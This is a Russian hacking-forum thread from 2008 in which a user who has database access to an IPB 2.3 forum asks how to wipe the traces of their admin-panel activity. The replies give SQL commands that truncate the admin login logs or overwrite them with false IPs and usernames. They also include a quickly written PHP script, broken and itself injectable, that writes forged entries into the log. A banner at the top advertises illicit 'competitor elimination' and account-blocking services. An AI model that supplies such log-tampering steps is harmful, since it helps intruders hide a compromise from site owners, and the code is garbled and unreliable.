Форум АНТИЧАТ - Убрать следы пребывания в админке. (ipb 2.3.*)

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
*Убрать следы пребывания в админке. (ipb 2.3.)**

Опции темы

Поиск в этой теме

Опции просмотра

Убрать следы пребывания в админке. (ipb 2.3.*)

25.05.2008, 00:06

Nek1t

Участник форума

Регистрация: 07.03.2008

Сообщений: 141

Провел на форуме:
405538

Репутация: 23

Убрать следы пребывания в админке. (ipb 2.3.*)

Сосбно сабж. При заходе в админку любому админу сразу справа видно, что делали другие админы.
+есть лог кто, когда и под каким IP заходил в админку.
Надо все это почистить.
п.с. доступ к БД (не из админки) есть...

25.05.2008, 02:54

ettee

Administrator

Регистрация: 12.10.2006

Сообщений: 466

Провел на форуме:
17234747

Репутация: 5170

ibf_admin_login_logs
ibf_admin_logs

PHP код:


		
			
UPDATE `ibf_admin_login_logs` SET `admin_ip_address` = "1.2.3.4"

PHP код:


		
			
TRUNCATE TABLE `ibf_admin_login_logs`

PHP код:


		
			
UPDATE `ibf_admin_login_logs` SET `admin_username`="niggaz makes you cry" WHERE `admin_username`="Nek1t"

PHP код:


		
			
UPDATE `ibf_admin_login_logs` SET `admin_ip_address`="" WHERE `admin_ip_address`="TvoiIP"

Последний раз редактировалось ettee; 25.05.2008 в 15:50..

25.05.2008, 10:08

Nek1t

Участник форума

Регистрация: 07.03.2008

Сообщений: 141

Провел на форуме:
405538

Репутация: 23

Спасибо, но это удалит только логи захода в админку.
А как быть с тем что сбоку в админке видно типа:

Цитата:

Admin изменил настройки форума
Admin удалил шаблон ***
и т.д.

Т.е. все действия записываются.

25.05.2008, 10:45

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

За это отвечает таблица ibf_admin_logs

PHP код:


		
			
UPDATE `ibf_admin_logs` SET `note` = `null`  WERE `member_id` = `ИД_Учётки`

25.05.2008, 11:02

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

составил сценарий на скорую руку который чистит следы пребывания в админке IPB .

PHP код:


		
			
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<title>Untitled Document</title>

<style type="text/css">

<!--

body {color: #EAFFC3;background-color:#615e5f;}

a:hover {color:#CC0033;}

a{color:#148044;text-decoration:none;}

a.pages{color:#FFFFFF;}

-->

</style></head>

<form name="addnews" action="" method="post">

<table border=1>

<tr>

    <td>admin_username:<input name="admin_username" type="text" value=""></td>

    <td>admin_ip_address:<input name="admin_ip_address" type="text" value=""></td>

    <td>note:<input name="date" type="note" value=""></td>

</tr>

<tr><td colspan=3>new info:<br/><textarea name="note" rows=5 cols=71 wrap="off"></textarea></td></tr>

</table>

<input type="submit" value="Send">

</form>

<?

//(C) WEB-DEFENCE.RU

//

include('config.php');// НЕ забудь сменить на путь до конфига.

if(empty($_POST['admin_username']) || empty($_POST['admin_ip_address']) || empty($_POST['note']) ||))

{

    echo 'Some of fields are empty!';

}

else

{

    if(!preg_match("/^\S+$/", $_POST['admin_username']))

    {

        echo 'Error with format of "admin_username"!'."\n";

    }

    elseif(!preg_match("/\S+/", $_POST['admin_ip_address']))

    {

        echo 'Error with format of "note"!'."\n";

    }

    else

    {

        $_POST['admin_username'] = htmlspecialchars($_POST['admin_username']);

        $_POST['title'] = htmlspecialchars($_POST['title']);

        $_POST['smalltext'] = htmlspecialchars($_POST['note']);

        $zc=mysql_query("select * from ibf_admin_login_logs");

        $zc=mysql_num_rows($zc);

        $myreq = "INSERT INTO ibf_admin_login_logs (admin_username, admin_ip_address, note, ) VALUES($zc, '$_POST[admin_username]', '$_POST[note]')"; //NOW()

        if(@mysql_query($myreq))

        {

            echo 'Added...'."\n";

            echo 'Title: '.$_POST['admin_username']."<br/>\n";

            echo 'Small news: '.$_POST['admin_ip_address']."<br/>\n";

            echo 'Full news: '.$_POST['note']."<br/>\n";

        }

        else

        {

            echo 'Can\'t add'."\n";

        }

    }

}

?>

25.05.2008, 15:18

Nek1t

Участник форума

Регистрация: 07.03.2008

Сообщений: 141

Провел на форуме:
405538

Репутация: 23

КВР
Спасиб

Насчет UPDATE `ibf_admin_logs` SET `note` = `null` WERE `member_id` = `ИД_Учётки` - ИМХО палевно.
Целая таблица в БД занулилась! Повод для того чтобы поискать взломщика

Насчет скрипта. Эмм.... Я так понимаю скрипт забивает везде одни и те же значения в таблицу с логами? (PHP учу еще пока...)

Я, к примеру, если замечаю что что-то изменилось в моей админке начинаю страшно параноить и искать залитые шеллы >:]

25.05.2008, 15:26

КВР

Познающий

Регистрация: 23.04.2008

Сообщений: 39

Провел на форуме:
198086

Репутация: 135

Nek1t, не таблица а поле note в котором хранятся все записи.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Можно ли ли получить доступ к Базе даных,имеея доступ к админке в движке Ipb ?	Crimson	Форумы	8	04.01.2006 22:10
Есть доступ к админке форума Ipb 1.3, проблемма: залить шелл.	rent0n	Форумы	14	04.01.2006 03:07
Как скачать в админке IPB базу данных?	hesher	Форумы	7	31.08.2005 20:35
Как залить шелл в Ipb, имея полноценный доступ к админке?	chip	Форумы	19	04.04.2005 11:19
Есть доступ к админке в IPB. Как можно просмотреть хэши?	chip	Форумы	26	17.03.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход